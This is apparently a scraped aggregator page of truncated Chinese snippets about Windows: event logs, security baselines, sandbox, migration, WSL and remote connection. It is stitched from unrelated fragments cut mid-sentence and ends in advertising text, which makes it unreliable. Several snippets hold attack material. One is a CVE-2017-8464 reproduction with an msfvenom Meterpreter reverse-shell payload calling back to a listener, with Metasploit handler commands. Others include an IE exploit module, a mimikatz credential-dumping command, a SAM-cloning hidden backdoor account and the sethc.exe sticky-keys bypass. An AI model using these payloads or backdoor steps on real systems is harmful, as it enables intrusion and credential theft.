Windows操作系统的日志分析 Windows日志简介 Windows操作系统在其运行的生命周期中会记录其大量的日志信息,这些日志信息包括:Windows事件日志,Windows服务器角色日志,FTP...Windows日志事件类型 Windows操作系统日志分析 Windows事件日志中记录的信息中,关键的要素包含事件级别、记录时间、事件来源、事件ID、事件描述、涉及的用户、计算机、操作代码及任务类别等...这里的事件ID与操作系统的版本有关。以下列举出常见的事件ID(操作系统为Vista/Win7/Win8/Win10/Server2008/Server 2012及之后的版本)。...Windows系统日志分为两大类:Windows日志、应用程序和服务日志。Windows日志记录事件数据超过20MB时,默认系统将优先覆盖过期的日志记录。...Windows系统使用自带的事件查看器来查看分析所有的Windows系统日志。
,设定不同的账户和账户组,管理员用户,数据库用户,审计用户,来宾用户等 删除或锁定与设备运行、维护等工作无关的账户 操作: 开始-->管理工具-->本地安全策略-->安全选项,最底下重命名系统管理员账户...->本地策略-->用户权限分配 02 审核策略 说明: 设置应配置日志功能,对用户登录进行记录,记录内容包括用户登录使用的账户,登录是否成功,登录时间,以及远程登录时所使用的ip地址 启用组策略中对windows...系统的审核策略更改,成功和失败都要审核 启用组策略中对windows系统的审核对象访问,成功和失败都要审核 启用组策略中对windwos系统的审核目录访问,成功和失败都要审核 操作系统审核特权使用策略安全基线要求项...操作系统审核系统事件策略安全基线要求项 操作系统审核账户管理策略安全基线要求项 操作系统审核过程追踪策略安全基线要求项 操作系统日志容量安全基线要求项 操作:开始-->管理工具-->本地安全策略-->...),不在此列表中的服务需关闭 列出系统启动时自动加载的进程和服务列表,不在此列表的需关闭 关闭远桌面,如需开启,修改端口 关闭Windows自动播放功能 对于远程登录的账号,设置不活动断连时间15分钟
Windows 10系统启用Windows沙盒 1、打开“控制面板”,点击“卸载程序”。 2、选择“启用或关闭Windows功能”选项。...3、勾选“Windows沙盒”选项,点击“确定”。 4、重启电脑。 5、重启后,在开始菜单中找到“Windows Sandbox”,点击运行即可。...注意: 当关闭Windows沙盒时,里面的内容全部清空,恢复初始化状态。
然而 Windows 系统自身并没有提供系统迁移的工具,不像 Linux 提供了 dd 命令可以用来直接镜像整个分区从而实现系统迁移。...更为遗憾的是,就算手头有 Linux 系统,直接使用 dd 对 Windows 系统进行拷贝,迁移后的 Windows 只会是蓝屏/黑屏,因为迁移系统不仅仅是拷贝分区就够了,对应的分区信息也要修改的。...虽然 Linux 也是这样,但 Linux 可以通过手动引导进入系统,然后再更新引导信息,而 Windows 一旦蓝屏/黑屏就令人束手无策了,Windows Live CD 提供的引导修复功能也不尽人意...迁移系统 在迁移系统前,首先要将划分出一块未分配的空间(要大于等于系统所在分区大小),这一步可以使用 Windows 自带的「磁盘管理」工具,或者使用「慠梅分区助手」。...附录 虽然 Windows 自带的「备份与还原」功能也可以实现系统迁移,但非常费时,而且如果你的 Windows 系统和数据是分开的,不在一个分区,Windows 自带的「备份与还原」还会备份数据盘的数据
Pycharm是python开发时的一款IDE(编辑器)。我们可以在Pycharm官网下载Mac最新版的Pycharm进行安装。http://w...
Python制作Windows系统服务 最近有个Python程序需要安装并作为Windows系统服务来运行,过程中碰到一些坑,整理了一下。...Python服务类 首先Python程序需要调用一些Windows系统API才能作为系统服务,具体内容如下: #!
这篇文章记录windows事件和日志的对应关系。...(Windows 10) – Windows security | Microsoft Docs 登录失败如果在windows事件查看器 — Windows日志 — 安全 查看不到日志,可能是因为没有开启...windows本地安全策略审核。...win7环境测试) 打开本地安全的略–审核特权使用 执行 mimikatz privilege::debug sekurlsa::ekeys SeTcbPrivilege 该特权标志着其拥有者是操作系统的一部分...,拥有该特权的进程可利用LsaLogonUser()执行创建登录令牌等操作,因此可以充当任意用户 经多次测试,2个文件系统的告警几乎和此告警同时出现,可视为这个操作同时产生的事件。
资源路径:https://download.csdn.net/download/lijiaheng525/10789382
PC机以前是Windows系统现在重装Linux系统 材料: 8G以上U盘(eveything版本很大,如果U盘容量不足请选择DVD版本ISO) UltralSO...准备:清除以前的Windows系统 tips:如果你准备装在其它盘符或者已经是干净的装机环境可跳过准备这个步骤,直接进入下面的装机步骤. 1 当前Windows系统如果还在运行的,可以选择下载U深度,制作启动盘....这个步骤就不详细阐述啦,这里就简单略过. 2 制作好启动盘后进入PE环境,将原来装有Windows系统的盘符使用分区工具格式化为FAT32格式....linux系统不一样,所以对硬盘我们需要清除windows的分区信息,选择全部删除,然后再点击回收空间 9.点击软件选择 10.我选择了代GUI服务器的安装,你们可以自己选择安装那个 11.都设置好了后...~ 17.Windows系统重装为Linux Centos7就完成啦 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/153440.html原文链接:https:
目录 什么是组件 组件一般都是系统自带都有的, 如:WINXP或WIN2000它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。...具体方式: 控制面板--添加或删除程序--添加/删除组件 1.CVE-2017-8464 原理 Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在...复现 环境部署 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=5555 -f psh-reflection...://192.168.0.102/search.ps1');test.ps1" #创建快捷件远程加载 远程监听 use exploit/multi/handler set payload windows...复现 search ms11_003 use exploit/windows/browser/ms11_003_ie_css_import set payload windows/meterpreter
2.3Windows 7的文件和文件夹管理 2.3.1文件和文件夹的概念 存放在计算机中的所有程序以及各种类型的数据,都是以文件的形式存储在磁盘上的,因此文件的组织和管理师操作系统要完成的主要功能之一...文件名是操作系统中区分不同文件的唯一标志。 文件名是操作系统中区分不同文件的唯一标志,同一文件夹下,文件与文件不能重名,文件与文件夹不能重名,文件夹与文件夹不能重名。 ...扩展名表示文件的类型,操作系统中根据扩展名建立了应用程序与文件的关联关系。 注意:文件可以没有扩展名。 计算机是通过文件夹来组织管理和存放文件的,文件夹用来分类组织存放文件。...当将文件或文件夹属性设置为“隐藏”后,在操作系统默认的设置中,该文件或文件夹将被隐藏起来,即不显示在“资源管理器”窗口中。当将文件属性设置为“只读”后,用户就不能修改该文件的内容。...回收站: 1.作用——暂时存储从硬盘中删除的文件或文件夹,防止误删除 2.回收站是一个特殊的系统文件夹,用户无法删除 3.用户可以调整回收站空间大小:右击回收站→“属性” 4.从除硬盘以外的可移动存储设备
0x001 系统账户隐藏 黑客入侵一台主机后,一般都想办法给自己留后门,其中使用最多的就是账户隐藏技术。...账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行复现。...然后重新启动注册表,即可看到如下效果 0x004 导出注册表 在 [SAM\Domains\Account\Users\Names] 项里显示了当前系统存在的所有账户,选中 test ,在其右侧有一个...,输入lusrmgr.msc 打开本地用户和组,查看用户,也无法列出该帐户 但可通过如下方式查看,这种方式的前提是必须已经清楚隐藏账户的名字,所以一般是管理员是不会发现的 使用这个隐藏账户可以登录系统...下面将这个键值的数据全部复制,并粘贴到 000003EB 项的 F 键值中,也就是将 administrator 用户的 SID 赋给了 test$ 这样在操作系统内部,实际上就把 test 当做是 administrator
在重装系统的时候,一个干净安全可信任的Windows原版系统镜像是必不可少的,不过对于很多人来说,在茫茫的网络资源库里,想找到一个自己想要的东西,却有点困难,搞不好就被盗版 网站骗了,下载了一个流氓的系统镜像...这里面收录了来自微软官方的Windows系统原版镜像,同时还有一些文件资源。比如开发者工具、服务器、设计人员工具、应用和拓展插件等等。...在左侧选择系统内部版本和系统语言,然后就会开始下载 下载 Office 的时候同理 以上就是几个可以免费下载微软WIndows系统原版镜像的方法,大家在进入网站的时候,注意区分是否是正版网站。...Windows10各个版本的区别: 一、Windows10家庭版 目前绝大部分新出厂的电脑使用的都是Windows10家庭版系统,Windows10家庭版具备大多数Windows10的关键功能,包括全新的开始菜单...~~ KMS 服务器地址 KMS.IFIBE.COM替代:kms.03k.org 激活 Windows 系统 首先需要将当前系统的密钥替换为批量授权 (GLVK) 然后在使用 KMS 激活,可以在这里找到对应的批量密钥
0x001 Windows 安全简介 目前,Windows 系统已经占据了绝大部分的桌面市场,同时在服务器市场也占有较大比重。长期以来,由于病毒攻击、黑客入侵等原因,给人们留下了易受攻击的不好印象。...本文将以 Windows 系统安全方面展开分享一些 Windows 系统安全防护措施。 0x002 Windows 安全基础 1....审核策略 启用本地安全策略中对Windows系统的审核策略更改,成功和失败操作都需要审核。...审核系统事件 启用本地安全策略中对Windows系统的审核系统事件,成功和失败操作都需要审核。...审核过程追踪 启用本地安全策略中对Windows系统的审核进程追踪,仅失败操作需要审核。
Windows安装类型 Windows 安装程序可以执行全新安装和升级安装。但是,无法执行计算机到计算机的迁移。...Windows 安装程序可以执行在升级操作系统时保留你的设置和首选项的安装。 ? 1. Windows审核模式 什么是审核模式?...测试 Windows 安装的有效性。在将系统部署到最终用户之前,你可以对系统执行测试,而无需创建用户帐户。然后你可以准备该系统,以便下次以 OOBE 启动。...WeiyiGeek.系统安装 从ESD(包括加密ESD以及UUP ESD)安装系统: 从Windows 8以后,微软会定期从Windows Update推送ESD。...跟ISO释放稍微不同的是,目标映像需要选择操作系统,如上图所示目标映像,千万别傻傻的选择Windows Setup。 ?
之前我写了server系统就地升级的文档:https://cloud.tencent.com/developer/article/2356121有朋友问PC系统怎么就地升级以win8.1升级win10为例...,从经验讲3个办法1、安装盘(ISO)方式,微软升级助手: Update Assistant英文站:https://www.microsoft.com/en-us/software-download/windows10...中文站:https://www.microsoft.com/zh-cn/software-download/windows10就地升级一般有2个选项或3个选项2、update升级3、以上就地升级的方式我个人都不太建议...,主要是操作步骤多、且安装慢,更建议备份数据后,直接全新安装高版本系统,如果是云上机器,如果有高版本镜像,直接用镜像重装后记:不支持tpm2.0的win10想升级win11参考我这篇文档
idt可以查看IDT表 GDT全局描述表 windows分为实模式(内核)和保护模式 实模式,Segment+Offset的方式访问,Segment16位(向后兼容,cpu位数增加寄存器位数增加,16位段寄存器数据被写入内存...pc_search_result_control_group&utm_term=idt+gdt+ldt++%E5%88%86%E9%A1%B5&spm=1018.2226.3001.4187 LDT局部描述表 任务切换,系统当前的局部描述符表
0x001 漏洞原理 在未登录系统时,连续按5次Shift键,可以弹出系统程序 c:\windows\system32\sethc.exe。...部分Win7或者Win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名。 注意:如果Windows系统已经打上该漏洞的补丁,则无法利用。...0x002 破解相关知识点 CMD工具路径 c:\windows\system32\cmd 用户/账户密码存储位置 c:\windows\system32\config\SAM 修改账户密码 net user...实验步骤: 开启Win7虚拟机,开机,并设置一个复杂的密码; 关机,并开机,在出现windows启动界面时强制关机; 再开机,出现“启动修复(推荐)”时选择该项; 出现系统还原提示,点击取消,等待几分钟后...再重启,输入密码即可登录系统,若设置空密码直接点击登录箭头即可进入。
介绍 适用于 Windows 的 Linux 子系统(英语:Windows Subsystem for Linux,简称 WSL)是一个为在 Windows 10 和 Windows Server 2019...2、在 控制面板 中 程序和功能 打开 启用或关闭 Windows功能 , 勾选 适用于 Linux 的 Windows 子系统,点击确定,等待系统配置完后重新启动电脑。...当然我感觉最重要的一点不是,真要在 windows 里面去使用子系统。 使用 打开 Windows Terminal 输入 wsl, 或者新建一个 tab 选择 Ubuntu 即可。...这样你可以在 Linux 里面执行 windows 命令,这样一来,如虎添翼啊。windows 把 Linux 置为子系统,这个骚操作简直太 逆天了。...感受 想想手头要维护十几台不同服务器上的 不同项目,用 windows 来维护 Linux,真的是扯。但现在不一样了。有了子系统。一切就不一样了。简直是沙漠上看到了绿洲哇。
远程连接Windows系统 远程连接机器 当我们获取到远程 Windows 系统的账号密码(明文或哈希)后,我们有哪些方式可以利用该账号密码进行远程连接呢?...传送门:Windows系统安全 | IPC共享和其他共享(C、D、Admin) WMIC远程连接:对方主机需开启admin共享,传送门:WMIC使用浅析 smbexec远程连接:对方主机需开启C共享,传送门...Windows Vista之前的系统,比如Windows Server2003、Windows XP,只要使用本地管理员组内账号即可。...Windows Vista之后的系统,比如Windows Server2008、Windows 7,默认只能使用 administrator 账号进行连接。...在 Windows Vista 以后的操作系统中,LocalAccountTokenFilterPolicy 的默认值为0,这种情况下内置账户 administrator 进行远程连接时会直接得到具有管理员凭证的令牌
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
